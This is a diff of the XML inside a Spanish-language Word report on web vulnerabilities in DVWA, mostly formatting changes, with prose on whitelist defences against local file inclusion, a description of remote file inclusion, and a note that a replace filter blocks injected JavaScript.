-        <w:t>, es decir cuando se procesa una solicitud de archivo o una solicitud de acceso a una BBDD, deben ser verificada si los formatos son permitidos y no contienen patrones malintencionados.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Definir un array de archivos permitidos y verificar si la entrada del usuario coincide con uno de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>estos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (lista blanca)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>U</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sar expresiones regulares o funciones de filtrado de PHP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de filtrado </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>más</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> robustas como, por ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0D09F3" wp14:editId="4A397133">
-            <wp:extent cx="4950662" cy="1208598"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1315818645" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F5BFC9D" wp14:editId="3DB0A302">
+            <wp:extent cx="5397500" cy="1999397"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="2108906798" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5108,7 +4855,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1315818645" name=""/>
+                    <pic:cNvPr id="2108906798" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5120,7 +4867,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5128527" cy="1252020"/>
+                      <a:ext cx="5429578" cy="2011279"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5136,122 +4883,9 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:firstLine="696"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Si la solicitud de entrada está dentro de los patrones maliciosos no </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>se validará</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> la entrada y en caso contrario </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>dejará pasarla.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.3.5.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Ejemplo de Mejora</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de código</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -5269,11 +4903,12 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A73D1A" wp14:editId="28556F49">
-            <wp:extent cx="5229447" cy="2413591"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
-            <wp:docPr id="1418912209" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5844F3" wp14:editId="2215076D">
+            <wp:extent cx="5400004" cy="1624083"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1818490894" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5281,7 +4916,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1418912209" name=""/>
+                    <pic:cNvPr id="1818490894" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5293,7 +4928,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5240125" cy="2418519"/>
+                      <a:ext cx="5425765" cy="1631831"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5312,46 +4947,40 @@
         <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Este enfoque mejorado utiliza una lista blanca de archivos permitidos, usa rutas absolutas, y maneja </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">los </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>casos de error, proporcionando una solución mucho más segura contra ataques LFI.</w:t>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Pero, en caso de introducir código JavaScript directamente en la web como se puede ver en la imagen, además de no ejecutarse la ventana de alerta, tampoco aparece en el código de la pagina web, ya que tiene implementado un filtro con “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>replace”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para evitar estas etiquetas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5359,195 +4988,25 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">VULNERABILIDAD DE INCLUSIÓN DE ARCHIVOS REMOTOS </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Descripción</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (RFI):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>La vulnerabilidad de inclusión de archivos remotos (RFI) permite a un atacante incluir archivos remotos en la aplicación web, lo que puede llevar a la ejecución de código malicioso en el servidor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>3.2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>NIVEL BAJO</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2E4E85" wp14:editId="26FE11E2">
-            <wp:extent cx="5400040" cy="1252064"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
-            <wp:docPr id="1470876366" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FEB2743" wp14:editId="2C1F005F">
+            <wp:extent cx="5400040" cy="2442949"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1973293707" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5555,7 +5014,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="187310969" name=""/>
+                    <pic:cNvPr id="1973293707" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5567,7 +5026,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="1252064"/>
+                      <a:ext cx="5411727" cy="2448236"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5583,525 +5042,27 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>La explicación es igual del código ya se ha explicado anteriormente, destacando que es un archivo PHP que obtiene el valor de entrada de la URL con el parámetro “page” y le asigna un valor a la variable $file, sin ninguna medida de validación ni control.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.2.1.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Riesgos:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
